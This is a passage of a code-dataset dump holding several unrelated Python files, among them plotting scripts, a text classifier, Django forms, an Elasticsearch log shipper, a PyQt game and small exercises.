rounding\")\nprint(psList)\nprint(scList)\n\n\"\"\"\nCreate the histograms from the lists\n\"\"\"\n\nnum_bins = 25\n# alpha: transparency of color\n# num_bins: amount of bars\nn, bins, patches = plot.hist(psList, num_bins, facecolor='blue', alpha = 0.5, label='Publisher-Subsriber')\nn, bins, patches = plot.hist(scList, num_bins, facecolor='green', alpha = 0.5, label='Server-Client')\n\n#plot.hist(psList,density=1, bins=600) \nplot.axis([1, 6, 0, 80]) #axis([xmin,xmax,ymin,ymax])\nplot.ylabel('Messages')\nplot.xlabel('Relay Time in milli seconds')\nplot.legend()\n\nplot.show()\n","sub_path":"pyplot/time_record_plot.py","file_name":"time_record_plot.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"412043463","text":"#!/usr/bin/env python\n\nitems = 5\n\n# basic definintion\ndef main():\n print(\"hello world\")\n print(\"What is the __name__ value ?? {}\".format(__name__))\n\n# while\ndef count_def():\n count = 0\n while count < items:\n print(count)\n count += 1\n\n# if\ndef if_def():\n count = 0\n value_to_find = 2\n\n while count < items:\n if count == value_to_find:\n print(\"Value {} found\".format(count))\n else:\n print(\"Value {} is different from {}\".format(count,value_to_find))\n count += 1\n\n# list\ndef list_def():\n my_list = []\n count = 0\n while count < items:\n print(count)\n my_list.append(count)\n count += 1\n \n print(my_list)\n\n# file / open\ndef write_to_file_def():\n my_list = []\n count = 0\n while count < items:\n print(count)\n my_list.append(count)\n count += 1\n \n print(my_list)\n\n filename = open(\"output.txt\",\"a\")\n print(my_list, file = filename)\n\n\nif __name__ == \"__main__\":\n # pass\n main()\n count_def()\n if_def()\n list_def()\n write_to_file_def()\n\n\n","sub_path":"Topic_05/code01/code01/code01.py","file_name":"code01.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"627722458","text":"import numpy as np\nimport pandas as pd\nimport timeit\n\ndf = pd.read_csv(\"reddit_train.csv\")\n\nX = df[\"comments\"].values\ny = df[\"subreddits\"].values\n\n# DOMAIN KNOWLEDGE\n# ADD MY OWN FEATURES\n # - ex. NBA: look for most frequent words\n# Try n-gram on countvectorizer\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, test_size = 0.2, random_state = 1234)\n\n# from sklearn.feature_extraction.text import CountVectorizer\n# tfidf_vectorizer = CountVectorizer(stop_words = 'english', max_features = 350000, ngram_range = (1, 2))\n# X_train_tfidf = tfidf_vectorizer.fit_transform(X_train)\n# X_test_tfidf = tfidf_vectorizer.transform(X_test)\n# print(X_train_tfidf.shape)\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\ntfidf_vectorizer = TfidfVectorizer(stop_words = 'english',max_features = 50000, ngram_range = (1, 1)) # 10000\nX_train_tfidf = tfidf_vectorizer.fit_transform(X_train)\nX_test_tfidf = tfidf_vectorizer.transform(X_test)\n\n# Timer begins\nstart = timeit.default_timer()\n\nfrom sklearn.naive_bayes import MultinomialNB\nmnb = MultinomialNB(alpha = 0.32)\nmnb.fit(X_train_tfidf, y_train)\n\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score\ny_pred = mnb.predict(X_test_tfidf)\nprint(accuracy_score(y_test, y_pred))\n\n#-----------------------------GRID SEARCH CROSS VALIDATION------------------------------\n# from sklearn.model_selection import GridSearchCV\n#\n# X_final_train = tfidf_vectorizer.fit_transform(X)\n#\n# tuned_parameters = [{'alpha' : [0.30, 0.31, 0.32, 0.33, 0.34]}]\n# n_folds = 10\n#\n# grid_search = GridSearchCV(estimator = mnb, param_grid = tuned_parameters, cv = n_folds, refit = False, n_jobs = -1)\n#\n# grid_search.fit(X_final_train, y)\n#\n# scores = grid_search.cv_results_['mean_test_score']\n# scores_std = grid_search.cv_results_['std_test_score']\n# print('scores:',scores)\n# print('scores_std',scores_std)\n# print(grid_search.best_params_)\n#\n# # Timer stops\n# stop = timeit.default_timer()\n# print(\"Time Execution: {}\".format(stop - start))\n\n#-----------------------------END OF GRID SEARCH-----------------------------------------\n\n#------------------------------Bagging Classifier Purpose-------------------\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn import model_selection\n\nX_final_train = tfidf_vectorizer.fit_transform(X)\n\nbg = BaggingClassifier(mnb, max_samples = 0.6, max_features = 0.5, n_estimators = 1500)\nresults = model_selection.cross_val_score(bg, X_final_train, y, cv = 5)\nprint(results.mean())\n# print(bg.score(X_final_train, y))\n# Timer stops\nstop = timeit.default_timer()\nprint(\"Time Execution: {}\".format(stop - start))\n#------------------------------End of Baggin classifier----------------------\n\n#-----------------------------FINAL TEST PURPOSE ONLY-----------------------\nX_final_train = tfidf_vectorizer.fit_transform(X)\n\ndf_final = pd.read_csv(\"reddit_test.csv\")\nX_final_test = df_final[\"comments\"].values\nX_final_test = tfidf_vectorizer.transform(X_final_test)\n\n# mnb.fit(X_final_train, y)\n# y_final = mnb.predict(X_final_test)\nbg.fit(X_final_train, y)\ny_final = bg.predict(X_final_test)\n\npredict_arr = np.c_[df_final[\"id\"], y_final]\npredict_dataset = pd.DataFrame({\"Id\": predict_arr[:, 0], \"Category\":predict_arr[:,1]})\npredict_dataset.to_csv(\"out_mnb.csv\", index = False)\n#--------------------------END OF FINAL TEST-----------------------------------\n","sub_path":"final_mnb.py","file_name":"final_mnb.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"175614811","text":"from stat import S_ISREG, ST_CTIME, ST_MODE, ST_MTIME\nimport os, sys, time, re\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n \ndef plotLine(name, xData, yData, color, symbol, line='-', doPoints=True):\n if len(xData)!=len(yData):\n print(\"Len x and y do not match: %d vs %d\" %(len(xData), len(yData)));\n #Sort data\n xData, yData = zip(*sorted(zip(xData, yData)))\n #Array of sampling vals for polyfit line\n xp = np.linspace(xData[0], xData[-1]*0.98, 100)\n #polyfit\n #default_z = np.polyfit(xData, yData, 6)\n #default_fit = np.poly1d(default_z)\n # plt.plot(\n # xp, \n # default_fit(xp), \n # str(color)+str(line),\n # label=str(name),\n # lw=1\n # );\n #points\n if(doPoints):\n default_h = plt.plot(\n xData,yData, \n str(symbol),\n label=str(name),\n lw=1,\n color=color\n );\n \ndef loadCSV(path):\n return np.loadtxt(\n path,\n dtype=[('Bin Count','int'), ('Population','int'),('atomic overall(ms)','float'),('atomic memset(ms)','float'),('atomic histogram(ms)','float'),('atomic scan(ms)','float'),('atomic reorder(ms)','float'),('atomic tex(ms)','float')],\n skiprows=2,\n delimiter=',',\n usecols=(2,3,10,11,12,13,14,15),\n unpack=True\n );\n### \n### Locate the suitable files in the directory (.csv's)\n###\npattern = re.compile(\"\\.csv$\");\n# get all entries in the directory w/ stats\nentries = (os.path.join('.', fn) for fn in os.listdir('.'))\n\n# leave only regular files\nentries = ((path)\n for path in entries if (bool (pattern.search(path))))\n\n###\n### Config, labelling\n###\ncolors = ['#000000','#000000','#000000','#999999','#999999','#999999'];\nsymbols = ['*', 'o', '^', 'x', 's', '+', 'h','p'];\nlines = ['-','--',':', '-', '--', ':'];\nfor path in entries:\n plt.clf();#Clear the entire figure\n plt.rc('font', family='serif', serif='Times')\n #plt.rc('text', usetex=True)\n plt.rcParams[\"font.family\"] = \"Times New Roman\"\n plt.rcParams[\"legend.fontsize\"] = 8\n plt.rc('xtick', labelsize=8)\n plt.rc('ytick', labelsize=8)\n plt.rc('axes', labelsize=8)\n fig = plt.figure()\n fig.set_size_inches(3.5, 3.5/1.4)\n #fig.set_size_inches(3.5*3, 3.5*3/1.4)\n co = 6;#5: overall step time, #6: kernel time, #7: rebuild/texture time\n #Label axis\n plt.xlabel('Bin Count');\n plt.ylabel('Overall Construction Time (ms)');\n plt.ticklabel_format(style='sci', useMathText=True, axis='x', scilimits=(0,0));\n ###\n ### Load Data, Create tuples of matching columns from each file\n ###\n csv = loadCSV(path);\n atomic_tex = csv.pop(-1);\n atomic_reorder = csv.pop(-1);\n atomic_scan = csv.pop(-1);\n atomic_histogram = csv.pop(-1);\n atomic_memset = csv.pop(-1);\n atomic_overall = csv.pop(-1);\n pop_size = csv.pop(-1);\n bin_count = csv.pop(-1);\n ###\n ### Filter data, Only publish bin width's that we want\n ###\n plotLine('Overall', bin_count, atomic_overall, colors[0], lines[0])\n plotLine('Memset', bin_count, atomic_memset, colors[1], lines[1])\n plotLine('Histogram', bin_count, atomic_histogram, colors[2], lines[2])\n plotLine('Scan', bin_count, atomic_scan, colors[3], lines[3])\n plotLine('Reorder', bin_count, atomic_reorder, colors[4], lines[4])\n plotLine('Tex', bin_count, atomic_tex, colors[5], lines[5])\n ###\n ### Position Legend\n ###\n #plt.legend(loc='lower right',numpoints=1);\n plt.legend(loc='best',numpoints=1);\n plt.tight_layout();\n ###\n ### Extract name, sans filetype\n ###\n fileName = os.path.splitext(os.path.basename(path))[0]\n ###\n ### Export/Show Plot\n ###\n #plt.savefig('[Atomic]'+ fileName + '.pdf')\n plt.savefig('[Atomic]'+ fileName + '.pdf')\n #plt.savefig('[Atomic]'+ fileName + '.pdf')\n plt.close();\n #plt.show();\n","sub_path":"figures/Thesis-ACS Experiment 1/fig_atomic_components.py","file_name":"fig_atomic_components.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"265716054","text":"from django_ltgt.ltgt.apps.data_table.forms import DataTableUpdateForm\nfrom ticket_distro.apps.event.forms import EventBasedForm\nfrom ticket_distro.apps.zone.models import Zone\n\n\nclass ZoneCreateForm(EventBasedForm):\n class Meta:\n model = Zone\n exclude = []\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\nclass ZoneUpdateForm(ZoneCreateForm, DataTableUpdateForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n","sub_path":"ticket_distro/apps/zone/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"571303528","text":"# Who's Your Daddy\n# \n# A program that lets the user enter the name of a male and\n# produces the name of his father.The user can add, replace,\n# and delete son-father pairs.\n\npairs = {\n \"BOBBY\" : \"ROBERT ROBERTSON\",\n \"DONNY\" : \"DANIEL DANIELSON\",\n \"DICKY\" : \"RICHARD RICHARDSON\",\n \"JONNY\" : \"JONATHAN JONATHANSON\"\n}\n\nchoice = None\n\n# print intro\nprint(\"\\tWelcome to Who's your Daddy!\\n\")\nwhile choice !=\"0\":\n # print menu\n print(\"Choices:\")\n print(\n \"\"\"\n 0 - Exit\n 1 - Name of a father\n 2 - Add a son-father pair\n 3 - Edit a son-father pair\n 4 - Delete a son-father pair\n 5 - List all son-father pairs\n \"\"\"\n )\n choice = input(\"\\nYour choice: \")\n\n # exit menu\n if choice == \"0\":\n print(\"Thank you for playing!\")\n continue\n\n # son -> parent\n if choice == \"1\":\n son = input(\"Whose father are you looking for: \")\n son = son.upper()\n if son == \"0\":\n print(\"Exiting...\")\n continue\n while son not in pairs:\n print(\"I don't know who that is, maybe try again?\")\n son = input(\"Whose father are you looking for: \")\n son = son.upper()\n print(f\"\\nI know that!\\nThe father of {son} is {pairs[son]}.\\n\")\n\n # add pair\n elif choice == \"2\":\n son = input(\"Who do you want to add in the database: \")\n son = son.upper()\n father = input(\"And who is their father: \")\n father.upper()\n while son in pairs and father == pairs[son]:\n print(\"The pair is already in the database! Try again\\n\")\n son = input(\"Who do you want to add in the database: \")\n son = son.upper()\n father = input(\"And who is their father: \")\n father.upper()\n pairs[son] = father.upper()\n print(\"Son-father pair added to the database.\\n\")\n\n # edit pair\n elif choice == \"3\":\n son = input(\"Who do you want to edit in the database: \")\n son = son.upper()\n while son not in pairs:\n print(\"I don't know who that is, maybe try again?\")\n son = input(\"Who do you want to edit in the database: \")\n son = son.upper()\n father = input(\"And who should their father be: \")\n father.upper()\n pairs[son] = father.upper()\n \n # delete pair\n elif choice == \"4\":\n son = input(\"Who do you want to delete in the database: \")\n son = son.upper()\n while son not in pairs:\n print(\"I don't know who that is, maybe try again?\")\n son = input(\"Who do you want to delete in the database: \")\n son = son.upper()\n pairs.pop(son)\n print(\"Job's done!\")\n \n # list pairs\n elif choice == \"5\":\n print(\"The pairs are:\")\n # print(pairs.items())\n print(\" Son | Father \")\n print(\"--------+\" + \"-\" * 20)\n for item in pairs:\n print(f\" {item:6} | {pairs[item]}\")\n\n # unknown input\n else:\n print(\"Not a defined command. Try again!\\n\\n\")\n\ninput(\"\\n\\nPress the enter key to exit.\")","sub_path":"Chapter05/ch03_whosYourDaddy.py","file_name":"ch03_whosYourDaddy.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"164770085","text":"import nltk\nfrom nltk.corpus import stopwords\nimport os\n\n\n\ndef build_stopwords_list(file_path):\n sw_list = []\n with open(file_path) as f:\n lines = f.readlines()\n for word in lines:\n word = word.replace('\\n', '')\n word = word.lower()\n sw_list.append(word)\n return sw_list\n\n\ndef remove_stopwords(sw_list, tokens):\n new_tokens = []\n for token in tokens:\n if token not in sw_list and len(token) > 3:\n new_tokens.append(token)\n return new_tokens\n\n\ndef get_files(path):\n files = []\n for filename in os.listdir(path):\n file_path = '{0}/{1}'.format(path, filename)\n files.append(file_path)\n return files\n\n\nclass StopWordsHandle:\n def __init__(self):\n self.stopwords_dir = ''\n self.nltk_languages = ['danish', 'dutch', 'english', 'finnish', 'french', 'german', 'hungarian', 'romanian',\n 'italian', 'norwegian', 'portuguese', 'russian', 'spanish', 'swedish',\n 'turkish', 'arabic', 'azerbaijani', 'nepali', 'greek', 'indonesian', 'kazakh']\n\n def clean_text(self, stopwords_dir, language, input_text):\n self.stopwords_dir = stopwords_dir\n if type(input_text) is list:\n clean_text = []\n for row in input_text:\n tokens = self.remove(language, row)\n if len(tokens) > 0:\n clean_text.append(' '.join(tokens))\n return clean_text\n else:\n return self.remove(language, input_text)\n\n\n def remove(self, language, text):\n if language in self.nltk_languages:\n tokens = nltk.word_tokenize(text)\n clear_text = self.remove_stopwords_with_nltk(language, tokens)\n return clear_text\n else:\n stopwords_files = get_files(self.stopwords_dir)\n file_path = self.get_stopwords_file(language, stopwords_files)\n stopwords_list = build_stopwords_list(file_path)\n tokens = nltk.word_tokenize(text)\n clear_text = remove_stopwords(stopwords_list, tokens)\n return clear_text\n\n def remove_stopwords_with_nltk(self, language, tokens):\n if len(tokens) != 0:\n stop_words = set(stopwords.words(language))\n return_list = []\n for token in tokens:\n if not token.lower() in stop_words and len(token) > 3:\n return_list.append(token)\n return ' '.join(return_list)\n else:\n return None\n\n def get_stopwords_file(self, language, files_list):\n for full_path in files_list:\n if language in full_path:\n return full_path\n\n\n def get_stopwords(self, language):\n stopwords_files = get_files(self.stopwords_dir)\n file_path = self.get_stopwords_file(language, stopwords_files)\n stopwords = build_stopwords_list(file_path)\n return stopwords\n\n\n\n","sub_path":"features/stopwords_handler.py","file_name":"stopwords_handler.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"473147084","text":"#!/usr/bin/env python\n# encoding=utf8\nimport os\n\nfrom prompt_toolkit.utils import DummyContext\nfrom ptpython.repl import PythonRepl, run_config\n\n\ndef shell(globals_, locals_):\n \"\"\"\n Customized pypython.repl.\n \"\"\"\n # Create REPL.\n repl = PythonRepl(\n get_globals=lambda : globals_,\n get_locals=lambda : locals_,\n history_filename=os.path.expanduser(\"~/.pyhistory.shell\"),\n )\n run_config(repl)\n\n with DummyContext():\n repl.run()\n","sub_path":"python/xiaket/interact.py","file_name":"interact.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"111438995","text":"\"\"\"Contains functionality for model creation and training\n\"\"\"\nimport numpy as np\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom . import common\n\n\ndef create_regional_model(model_type='normal'):\n \"\"\"Creates a regional model\n\n Currently, the only supported model type is 'normal'.\n\n Parameters\n ----------\n model_type : {'normal'}\n\n Returns\n -------\n regional_model : dict\n \"\"\"\n # Handle unsupported arguments\n supported_model_types = ('normal',)\n if model_type not in supported_model_types:\n raise Exception('Unsupported regional model type: {}'.format(model_type))\n\n regional_model = {'model_type': model_type,\n 'is_trained': False}\n return regional_model\n\n\ndef create_boundary_model(model_type='exponential',\n extracted_feature_type=None):\n \"\"\"Creates a boundary model\n\n Supports several model types. Only the 'decision_tree' type allows for model\n training.\n\n Parameters\n ----------\n model_type : {'constant', 'exponential', 'inverse', 'sigmoidal', \\\n 'decision_tree'}\n extracted_feature_type : {1}\n Type-1 is the \"absolute difference, average\" feature.\n\n Returns\n -------\n boundary_model : dict\n \"\"\"\n # Handle unsupported arguments\n supported_model_types = ('constant', 'exponential', 'inverse', 'sigmoidal',\n 'decision_tree')\n if model_type not in supported_model_types:\n raise Exception('Unsupported boundary model type: {}'.format(model_type))\n\n if model_type is 'decision_tree':\n dtc_model = DecisionTreeClassifier(class_weight='balanced')\n boundary_model = {'model_type': model_type,\n 'model': dtc_model,\n 'is_trained': False,\n 'extracted_feature_type': extracted_feature_type}\n else:\n boundary_model = {'model_type': model_type,\n 'is_trained': False}\n return boundary_model\n\n\ndef train_regional_model(regional_model, training_data, training_labels):\n \"\"\"Trains a regional model\n\n Parameters\n ----------\n regional_model : dict\n training_data : np.array\n Has either two or three axes. The first two axes specify a pixel\n location. If the image is multimodal, then the array has a third\n axis that specifies a mode/feature.\n training_labels : np.array\n Class labeling from a previous segmentation, which was either\n created manually with an image editor or create automatically\n though a first pass with SAASS. The array has two axes that\n specify a pixel location. The values in the array are label values\n (0 for bg, 1 for fg).\n\n Notes\n -----\n This function modifies the model dict that is provided as an argument.\n \"\"\"\n # Handle unsupported arguments\n supported_model_types = ('normal',)\n if regional_model['model_type'] not in supported_model_types:\n raise Exception('Unsupported regional model type: {}'.format(model_type))\n\n bg = {'mean': training_data[training_labels == 0].mean(),\n 'std' : training_data[training_labels == 0].std()}\n fg = {'mean': training_data[training_labels == 1.0].mean(),\n 'std' : training_data[training_labels == 1.0].std()}\n\n regional_model['bg'] = bg\n regional_model['fg'] = fg\n regional_model['is_trained'] = True\n\n\ndef train_boundary_model(boundary_model, training_data, training_labels, edges):\n \"\"\"Trains a boundary model\n\n Parameters\n ----------\n boundary_model : dict\n training_data : np.array\n Has either two or three axes. The first two axes specify a pixel\n location. If the image is multimodal, then the array has a third\n axis that specifies a mode/feature.\n training_labels : np.array\n Class labeling from a previous segmentation, which was either\n created manually with an image editor or create automatically\n though a first pass with SAASS. The array has two axes that\n specify a pixel location. The values in the array are label values\n (0 for bg, 1 for fg).\n edges : list of tuples\n Indices of neighboring pixels in the image. List consists of various\n 2-component tuples. Each component is the index of a pixel. The two\n pixels in any given tuple are pixels that neighbor one another. This\n list provides a way to index into `training_data`. Typically, this list\n is obtained by creating a 2D grid graph of the dimensions of the image\n and retreiving all edges from that graph.\n\n Returns\n -------\n Xtrain : np.array\n The feature array that was built and used during training. This array\n can be used to visualize the trained model, but doing so is optional.\n\n Notes\n -----\n This function modifies the model dict that is provided as an argument.\n \"\"\"\n # Handle unsupported arguments\n supported_model_types = ('decision_tree',)\n if boundary_model['model_type'] not in supported_model_types:\n raise Exception('Boundary model type {} ' \\\n 'does not support training'.format(model_type))\n\n # Get the locations of all the bg, fg nodes\n # in the initial segmentation\n bg_nodes = set(zip(*((training_labels < training_labels.max()).nonzero())))\n fg_nodes = set(zip(*((training_labels > training_labels.min()).nonzero())))\n\n # Cast training data as float\n # Needed because the model misbehaves when given integer data\n training_data = training_data.astype(np.float)\n\n # Get values/weights for bg, fg, boundary edges\n # boundary edges are edges between nodes that belong to different classes\n # ie. (bg, fg) or (fg, bg)\n bg_edge_vals = [\n (training_data[xi], training_data[xj])\n for xi, xj in edges\n if ((xi in bg_nodes) and (xj in bg_nodes))]\n fg_edge_vals = [\n (training_data[xi], training_data[xj])\n for xi, xj in edges\n if ((xi in fg_nodes) and (xj in fg_nodes))]\n boundary_edge_vals = [\n (training_data[xi], training_data[xj])\n for xi, xj in edges\n if ((xi in bg_nodes) and (xj in fg_nodes) or\n (xi in fg_nodes) and (xj in bg_nodes))]\n\n # Compute extracted features for bg, fg, boundary edges values\n Xbg = common.extract_boundary_feature(boundary_model['extracted_feature_type'], bg_edge_vals)\n Xfg = common.extract_boundary_feature(boundary_model['extracted_feature_type'], fg_edge_vals)\n Xbound = common.extract_boundary_feature(boundary_model['extracted_feature_type'], boundary_edge_vals)\n\n # Stack feature arrays\n Xtrain = np.vstack([Xbg, Xfg, Xbound])\n Ytrain = np.hstack([np.zeros((Xbg.shape[0] + Xfg.shape[0],)),\n np.ones((Xbound.shape[0],))])\n\n # Train/fit model with features\n boundary_model['model'].fit(Xtrain, Ytrain)\n boundary_model['is_trained'] = True\n\n return Xtrain\n","sub_path":"saass/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"274672124","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\n\n#####----------------------------------------------------------------#####\n##### #####\n##### 使用教程/readme: #####\n##### https://cloud.tencent.com/document/product/583/47077 #####\n##### #####\n#####----------------------------------------------------------------#####\n\nimport os\nimport json\nimport datetime\nimport time\nimport logging\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\n\n#必填参数\nES_Address = os.getenv('ES_Address')\nES_User = os.getenv('ES_User')\nES_Password = os.getenv('ES_Password')\nES_Index_KeyWord = os.getenv('ES_Index_KeyWord') #建立索引的前缀关键词,如填Log\n#可选配参数\nES_Log_IgnoreWord = os.getenv('ES_Log_IgnoreWord') #需要删除的关键词,缺省则全量写入,如填name,password\nES_Index_TimeFormat = os.getenv('ES_Index_TimeFormat') #按照天或者小时设置Index,缺省则按照天建立索引,如填hour\n\n\nlogger = logging.getLogger('elasticsearch')\nlogger.setLevel(logging.INFO)\n\nes = Elasticsearch([ES_Address], http_auth=(ES_User, ES_Password))\n\nif ES_Index_TimeFormat == \"hour\":\n ES_Index_TimeFormat = \"%Y-%m-%d-%H\"\nelse:\n ES_Index_TimeFormat = \"%Y-%m-%d\"\n\n#日志清洗逻辑,可自行修改\ndef deallog(log): \n if ES_Log_IgnoreWord != None:\n for key in ES_Log_IgnoreWord.split(\",\"):\n log.pop(key, None)\n log[\"time\"] = datetime.datetime.now().isoformat()\n return log\n\ndef gendata(records):\n for record in records:\n try:\n log = record\n while type(log) != dict:\n log = json.loads(log)\n #可针对Ckafka中的某些关键字段进行转义或者修改\n if \"message\" in log.keys() and type(log['message']) == str:\n message = json.loads(log['message'])\n log.pop(\"message\", None)\n log.update(message)\n log = deallog(log)\n except:\n print(\"except:\",record)\n log = {\"record\":record}\n\n log['_index'] = ES_Index_KeyWord + '-' + datetime.datetime.now().strftime(ES_Index_TimeFormat)\n\n if \"log_id\" in log.keys():\n log['_id'] = log['log_id']\n\n yield log\n\ndef main_handler(event, context):\n print('start main_handler')\n num = len(event['event']['data'])\n print('the length of msg body is [%s]'%num) \n bulk(es, gendata(event['event']['data']))\n result = {\n 'result': 'Succeed'\n }\n return result\n\nif __name__ == '__main__':\n main_handler(None, None)\n","sub_path":"Python3.6-CkafkaConnectorSinkToElasticsearch/src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"577135100","text":"from gensim.models import KeyedVectors\r\nimport numpy as np\r\n\r\nglobal model\r\nglobal index2word_set\r\n\r\nmodel = KeyedVectors.load_word2vec_format('genism_data.bin', binary=True)\r\nmodel_list_word = list(model.wv.vocab)\r\n\r\n\r\n\r\ndef avg_feature_vec(sentence, model, num_features, model_list_word):\r\n\r\n words_in_sentence = sentence.split()\r\n feature_vec = np.zeros((num_features,), dtype='float32')\r\n count_words = 0\r\n for word in words_in_sentence:\r\n if word in model_list_word:\r\n count_words += 1\r\n feature_vec = np.add(feature_vec, model[word])\r\n\r\n if (count_words > 0):\r\n feature_vec = np.divide(feature_vec, count_words)\r\n\r\n return feature_vec\r\n\r\n","sub_path":"model_word2vec.py","file_name":"model_word2vec.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"179161944","text":"# -*- coding: utf-8 -*-\n\nimport sys\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport model\n\napp = QApplication(sys.argv)\n\n#QMainWindow ger oss tillgång till andra funktioner som menyer, statusrad mm6\nclass MyGame(QMainWindow):\n\n def __init__(self, parent=None):\n super(MyGame, self).__init__()\n\n self.setWindowTitle(\"Game template\")\n self.initUI()\n\n self.timer = QBasicTimer()\n self.time = 0\n\n self.timer.start(1000/60,self)\n\n def initUI(self):\n \"\"\"Initierar alla komponenter\"\"\"\n\n self.frame = QWidget(self)\n self.setCentralWidget(self.frame)\n\n self.frame.setMouseTracking(True)\n\n #Hela fönstret\n self.layout = QVBoxLayout()\n\n #Widgets\n self.model = model.model(self)\n self.model.setLineWidth(3)\n self.model.setFrameStyle(QFrame.Plain)\n self.model.setMinimumSize(500,500)\n self.layout.addWidget(self.model)\n\n self.model.setFocus()\n\n\n self.frame.setLayout(self.layout)\n\n #Statusbar\n self.statusBar().showMessage('Ready')\n\n def keyPressEvent(self, event):\n \"\"\" this method checks if a button is pressed\"\"\"\n\n key = event.key()\n\n # start to move the player if a button is pressed\n if(key == Qt.Key_W):\n self.model.should_player_move(\"w\", False)\n\n if(key == Qt.Key_S):\n self.model.should_player_move(\"s\", False)\n\n if(key == Qt.Key_D):\n self.model.should_player_move(\"d\", False)\n\n if(key == Qt.Key_A):\n self.model.should_player_move(\"a\", False)\n\n self.update()\n\n def keyReleaseEvent(self, event):\n \"\"\" this method checks if a button is released\"\"\"\n\n key = event.key()\n\n # stop the player if any of the movebuttons is released\n if(key == Qt.Key_W):\n self.model.should_player_move(\"w\", True)\n\n if(key == Qt.Key_S):\n self.model.should_player_move(\"s\", True)\n\n if(key == Qt.Key_D):\n self.model.should_player_move(\"d\", True)\n\n if(key == Qt.Key_A):\n self.model.should_player_move(\"a\", True)\n #######################################################\n\n self.update()\n\n def timerEvent(self,event):\n if (event.timerId() == self.timer.timerId()):\n\n\n\n if(self.time >= 1.0):\n self.time = 0.0\n self.time += 1/15\n\n\n self.time = float(\"%.2f\"% self.time)\n\n\n # call the move_player method\n self.model.move_player(self.time)\n self.model.check_collision()\n\n currentPos = self.frame.mapFromGlobal(QCursor.pos())\n\n # get the mouse position\n self.mouse_x = currentPos.x()\n self.mouse_y = currentPos.y()\n\n # check if the mouse is outside the window\n # if it is set it to either 0 or 500\n if(self.mouse_x > 500):\n self.mouse_x = 500\n if(self.mouse_x < 0):\n self.mouse_x = 0\n if(self.mouse_y > 500):\n self.mouse_y = 500\n if(self.mouse_y < 0):\n self.mouse_y = 0\n\n # print out mouse pos\n #print(self.mouse_x,self.mouse_y)\n\n self.model.player_rotate(self.mouse_x, self.mouse_y)\n\n self.update()\n\n\n def mousePressEvent(self, event):\n self.model.should_player_shoot(True)\n\n def mouseReleaseEvent(self, event):\n self.model.should_player_shoot(False)\n\n def run(self):\n self.show()\n sys.exit(app.exec_())\n\n#Skapar en instans och kör den\nMyGame().run()\n","sub_path":"topdown/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"327694806","text":"import unittest\n\nimport solutions.shortest_distance_to_a_character.index as main\n\n\nclass Test(unittest.TestCase):\n\n def test_shortestToChar(self):\n test_patterns = [\n (\"loveleetcode\", \"e\", [3, 2, 1, 0, 1, 0, 0, 1, 2, 2, 1, 0]),\n ]\n\n for i, (arg1, arg2, expected) in enumerate(test_patterns):\n with self.subTest(test=i):\n s = main.Solution()\n self.assertEqual(s.shortestToChar(arg1, arg2), expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"solutions/shortest_distance_to_a_character/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"584398286","text":"from os.path import exists\n\ndef intro():\n print(\"\\nThis program asks to enter some sentences, until you just press [enter].\\nWhen you are done with the input, the program with print all the lines.\\nAfter that, it will ask you if you would like to save it to a file.\\n\")\n\ndef input_text():\n text_list = []\n while(True):\n question = input(\"Enter a sentence: \")\n if(len(question) is 0):\n return text_list\n else:\n text_list.append(question)\n\ndef print_list_to_screen(text_list):\n for i in text_list:\n print(i)\n\ndef question_choice(question, possible_answer_tuple):\n while(True):\n ask_question = input(question)\n for k in possible_answer_tuple:\n if(ask_question == k):\n return ask_question\n\ndef save_to_file(file_name, text_list):\n if (not exists(file_name)):\n f = open(file_name, \"x\")\n f.close()\n else:\n choice = question_choice(\"This file already exists, want to overwrite it? (y/n) \", (\"y\", \"n\"))\n if(choice is \"n\"):\n exit()\n f = open(file_name, \"w\")\n data = \"\"\n for t in text_list:\n data += f\"{t}\\n\"\n f.write(data)\n f.close()\n\ndef save_question(text_list):\n choice = question_choice(\"Would you like to save 